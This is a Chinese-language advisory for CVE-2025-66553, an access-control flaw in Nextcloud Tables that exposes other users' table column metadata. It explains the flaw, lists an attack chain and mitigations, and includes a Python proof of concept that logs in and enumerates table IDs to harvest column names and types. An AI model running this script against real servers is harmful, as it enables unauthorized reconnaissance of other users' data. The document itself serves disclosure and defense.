CVE-2025-66553 Nextcloud Tables授权用户可查看其他表列元数据信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-66553

漏洞类型

授权绕过/信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nextcloud Tables

漏洞概述

CVE-2025-66553是Nextcloud Tables应用中的一个信息泄露漏洞，严重程度为中危（CVSS 4.3）。该漏洞允许已认证的低权限用户在Nextcloud Tables应用中，通过修改HTTP请求中的数字ID参数，非法访问其他用户创建的表格列元数据信息。Nextcloud Tables是Nextcloud云存储平台的一个重要组件，允许用户创建自定义的数据表格并定义各种类型的列。在漏洞未修复的版本中（0.8.7之前和0.9.4之前），应用程序对用户访问表格列数据的权限验证存在缺陷。具体而言，当用户尝试查看某个表格的列信息时，系统仅检查用户是否已登录，但未能正确验证用户是否有权访问目标表格。由于缺少充分的对象级访问控制，攻击者可以通过遍历表格ID的方式，获取其本无权访问的表格的列定义信息，包括列名、列类型、数据格式等敏感元数据。这种信息泄露虽然不直接暴露表格中的实际数据内容，但列元数据本身可能包含业务敏感信息，如数据字段的业务含义、数据结构设计等，攻击者可以利用这些信息进行进一步的攻击或情报收集。该漏洞需要攻击者具备有效的Nextcloud账户（低权限即可），无需任何用户交互即可实现攻击，攻击复杂度低，影响范围主要为机密性（低影响）。

技术细节

Nextcloud Tables应用的漏洞根因在于缺少对表格列资源访问的充分授权验证。在正常业务逻辑中，用户A创建的表格及其列信息应当仅对A本人以及A明确授权的其他用户可见。然而，在受影响版本中，应用程序在处理GET请求获取表格列信息时，仅验证了用户的认证状态（是否已登录），而未验证用户与目标表格的所有权或访问权限关系。攻击者首先需要拥有一个有效的Nextcloud账户，即使是普通用户权限即可。然后，攻击者需要通过API或Web界面获取某个表格的ID（例如通过猜测、枚举或社会工程学手段获取）。接着，攻击者构造一个针对目标表格列信息的API请求，将目标表格ID作为参数（如/api/tables/{table_id}/columns）。服务器在处理该请求时，错误地认为已登录用户有权访问该表格的列信息，因此返回了包含列名、列类型、字段属性等敏感元数据的响应。攻击者可以通过脚本自动化这一过程，遍历大量可能的表格ID，从而批量收集系统中各表格的列结构信息。修复方案在版本0.8.7和0.9.4中实现，添加了对表格所有权的验证逻辑，确保只有表格创建者或被授权用户才能访问其列信息。

攻击链分析

STEP 1

步骤1

攻击者获取有效的Nextcloud账户（低权限用户账户即可）

STEP 2

步骤2

攻击者通过社会工程、钓鱼或其他手段获取目标表格的ID编号

STEP 3

步骤3

攻击者构造恶意的API请求，访问目标表格的列元数据接口（如/apps/tables/api/1/tables/{table_id}/columns）

STEP 4

步骤4

服务器在未验证用户与表格所有权关系的情况下，返回包含列名、列类型等敏感元数据的响应

STEP 5

步骤5

攻击者通过脚本自动化遍历多个表格ID，批量收集系统中各表格的列结构信息

STEP 6

步骤6

攻击者利用泄露的元数据信息进行进一步攻击，如识别敏感数据表、规划数据窃取策略等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # CVE-2025-66553 PoC - Nextcloud Tables Information Disclosure # Target: Nextcloud Tables < 0.8.7 and < 0.9.4 TARGET_URL = "https://vulnerable-nextcloud.example.com" USERNAME = "[email protected]" PASSWORD = "password123" def authenticate(): """Authenticate to Nextcloud and get session cookies""" session = requests.Session() login_url = f"{TARGET_URL}/login" # Get CSRF token response = session.get(login_url) csrf_token = session.cookies.get('nc_token') or 'your_csrf_token' # Login request login_data = { 'user': USERNAME, 'password': PASSWORD, 'requesttoken': csrf_token } response = session.post(login_url, data=login_data) if response.status_code == 200: return session return None def exploit_table_columns(session, table_id): """Attempt to retrieve column metadata from target table""" columns_url = f"{TARGET_URL}/apps/tables/api/1/tables/{table_id}/columns" headers = { 'OCS-APIREQUEST': 'true', 'Content-Type': 'application/json' } response = session.get(columns_url, headers=headers) if response.status_code == 200: try: data = response.json() if data and len(data) > 0: print(f"[!] Disclosed columns for table ID {table_id}:") for col in data: print(f" Column: {col.get('title')}, Type: {col.get('type')}") return data except json.JSONDecodeError: pass return None def main(): print("[*] CVE-2025-66553 PoC - Nextcloud Tables Information Disclosure") print("[*] Authenticating to Nextcloud...") session = authenticate() if not session: print("[-] Authentication failed") return print("[+] Authentication successful") print("[*] Enumerating table IDs to extract column metadata...") # Enumerate table IDs (typically sequential integers) for table_id in range(1, 100): columns = exploit_table_columns(session, table_id) if columns: print(f"[+] Successfully extracted metadata from table {table_id}") print("[*] PoC execution completed") if __name__ == "__main__": main()

影响范围

Nextcloud Tables < 0.8.7

Nextcloud Tables < 0.9.4

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）限制Tables应用的访问权限，仅允许受信任的用户使用；2）审查并限制用户创建表格的权限；3）配置Web应用防火墙（WAF）规则，监控和阻止异常的表格ID访问模式；4）启用Nextcloud的入侵检测功能，对异常API请求进行告警；5）考虑暂时禁用Tables应用直至完成升级。